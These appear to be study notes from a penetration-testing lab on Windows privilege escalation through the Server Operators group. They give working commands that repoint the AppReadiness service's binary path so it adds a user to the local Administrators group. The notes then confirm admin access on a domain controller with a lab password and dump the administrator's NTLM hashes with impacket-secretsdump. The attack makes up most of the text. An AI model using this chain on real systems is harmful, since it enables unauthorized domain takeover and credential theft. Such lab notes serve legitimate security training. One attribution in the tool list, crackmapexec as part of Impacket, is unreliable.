Server Operators

Server Operator group has SERVICE_ALL_ACCESS

Query the AppReadiness service (it starts as SYSTEM)

sc qc AppReadiness

Checking Service permissions with PsService

PsService.exe security AppReadiness

Check a group members

net localgroup administrators

Modify the service binary path

It adds our current use to the default admin group

sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"

Confirm local admin group membership

net localgroup administrators

Confirm local admin access on domain controller

nxc smb 10.129.43.9 -u server_adm -p 'HTB_@cademy_stdnt!'

Retrieving NTLM password hashes from domain controller

impacket-secretsdump server_adm@10.129.43.9 -just-dc-user administrator

Key Concepts:

• Service Permissions: * The Server Operators group has SERVICE_ALL_ACCESS to many services. * This allows them to modify service configurations.

• Service Modification: * The AppReadiness service is used as an example. * The service's binary path is modified to execute a command.

• Privilege Escalation: * The modified service command adds the attacker's user to the local administrators group. * This results in full control over the machine.

Approach, Commands, Tools, and Techniques:

1. Service Query: * sc qc AppReadiness (Verify service details).

2. Service Permissions Check: * PsService.exe security AppReadiness (Verify Server Operators permissions).

3. Local Administrators Check: * net localgroup Administrators (Verify current group members).

4. Service Configuration Modification: * sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add" (Modify service binary path).

5. Service Start (Trigger): * sc start AppReadiness (Start the service, triggering the command).

6. Local Administrators Verification: * net localgroup Administrators (Verify successful group addition).

7. Post-Exploitation: * crackmapexec smb <target_ip> -u <user> -p <password> (Verify administrative access). * secretsdump.py <user>@<target_ip> -just-dc-user administrator (Extract NTDS.dit hashes). Commands:

• sc qc

• sc config

• sc start

• net localgroup Administrators

• crackmapexec smb

• secretsdump.py Tools:

• sc.exe (Windows built-in)

• PsService.exe (Sysinternals)

• crackmapexec (Impacket)

• secretsdump.py (Impacket Techniques:

• Abusing service permissions.

• Modifying service configurations.

• Adding users to local administrators group.

• Post-exploitation using Impacket. Key Considerations:

• Service availability: The targeted service must be available.

• Permissions: The account must be a member of the Server Operators group.

• Post exploitation: Once admin access is granted, many post exploitation tasks are available.